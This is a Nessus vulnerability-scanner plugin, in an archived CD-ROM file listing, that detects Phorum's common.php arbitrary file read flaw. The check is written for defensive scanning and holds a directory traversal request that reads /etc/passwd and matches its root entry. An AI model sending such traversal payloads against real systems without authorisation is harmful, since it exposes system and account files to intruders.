home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phorum.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  5. #      Erik Anderson <eanders@carmichaelsecurity.com>
  6. #      Added BugtraqID
  7. #
  8. # See the Nessus Scripts License for details
  9. #
  10.  
  11. if(description)
  12. {
  13.  script_id(10593);
  14.  script_bugtraq_id(1985);
  15.  script_version ("$Revision: 1.16 $");
  16.  name["english"] = "phorum's common.cgi";
  17.  name["francais"] = "phorum's common.cgi";
  18.  script_name(english:name["english"], francais:name["francais"]);
  19.  
  20.  desc["english"] = "The CGI script 'common.php', which
  21. comes with phorum, is installed. This CGI has
  22. a well known security flaw that lets an attacker read arbitrary
  23. files with the privileges of the http daemon (usually root or nobody).
  24.  
  25. Solution : remove it
  26. Risk factor : High";
  27.  
  28.  
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "Checks for the presence of common.cgi";
  33.  summary["francais"] = "VΘrifie la prΘsence de common.cgi";
  34.  
  35.  script_summary(english:summary["english"], francais:summary["francais"]);
  36.  
  37.  script_category(ACT_GATHER_INFO);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  41.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  42.  family["english"] = "CGI abuses";
  43.  family["francais"] = "Abus de CGI";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes", "http_version.nasl");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. function check(prefix)
  58. {
  59.   req = http_get(item:string(prefix, "?f=0&ForumLang=../../../../../../../etc/passwd"),
  60.            port:port);
  61.   buf = http_keepalive_send_recv(port:port, data:req);
  62.   if( buf == NULL ) exit(0);
  63.   
  64.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf)) {
  65.       security_hole(port);
  66.     exit(0);
  67.     }
  68. }
  69.  
  70. port = get_http_port(default:80);
  71.  
  72. if(!get_port_state(port))exit(0);
  73. if(!can_host_php(port:port))exit(0);
  74.  
  75.  
  76.  
  77. foreach dir (cgi_dirs())
  78. {
  79. check(prefix:string(dir, "/support/common.php"));
  80. check(prefix:string(dir, "/common.php"));
  81. }
  82.